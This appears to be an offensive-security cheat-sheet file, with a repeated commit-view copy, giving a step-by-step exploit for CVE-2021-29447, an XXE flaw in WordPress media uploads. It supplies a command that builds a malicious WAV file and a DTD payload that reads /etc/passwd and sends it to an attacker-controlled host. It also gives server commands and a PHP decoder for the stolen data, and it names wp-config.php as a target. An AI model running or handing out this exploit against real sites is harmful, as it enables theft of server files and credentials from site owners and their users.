killchain-compendium/exploit/web/xxe/wp_xxe_.md

# CVE-2021-29447

* Upload of wav file has following consequences
    * **Arbitrary File Disclosure** for example `wp-config.php`
    * **Server Side Request Forgery** 


## Usage

* Create `wav` Payload
```sh
echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '"'"'http://<attacker-IP>:<Port>/NAMEEVIL.dtd'"'"'>%remote;%init;%trick;]>\x00' > payload.wav
```
* Create `dtd` Payload, which is downloaded from attacker machine by the wp instance. Following payload
```sh
<!ENTITY % file SYSTEM "php://filter/zlib.deflate/read=convert.base64-encode/resource=/etc/passwd">
<!ENTITY % init "<!ENTITY &#x25; trick SYSTEM 'http://<attacker-IP>:<attackerPort>/?p=%file;'>" >
```

* Launch http server
```sh
php -S 0.0.0.0:8000
python -m http.server
```
* Copy returned base64 into `php` file
```php
<?php echo zlib_decode(base64_decode('<returnedBase64>')); ?> 
```
added wp exploit 2021-08-29 00:58:13 +02:00			`# CVE-2021-29447`

			`* Upload of wav file has following consequences`
			* Arbitrary File Disclosure for example `wp-config.php`
			`* Server Side Request Forgery`


			`## Usage`

			* Create `wav` Payload
			```sh
			`echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '"'"'http://<attacker-IP>:<Port>/NAMEEVIL.dtd'"'"'>%remote;%init;%trick;]>\x00' > payload.wav`
			```
			* Create `dtd` Payload, which is downloaded from attacker machine by the wp instance. Following payload
			```sh
			`<!ENTITY % file SYSTEM "php://filter/zlib.deflate/read=convert.base64-encode/resource=/etc/passwd">`
			`<!ENTITY % init "<!ENTITY % trick SYSTEM 'http://<attacker-IP>:<attackerPort>/?p=%file;'>" >`
			```

			`* Launch http server`
			```sh
			`php -S 0.0.0.0:8000`
			`python -m http.server`
			```
			* Copy returned base64 into `php` file
			```php
			`<?php echo zlib_decode(base64_decode('<returnedBase64>')); ?>`
			```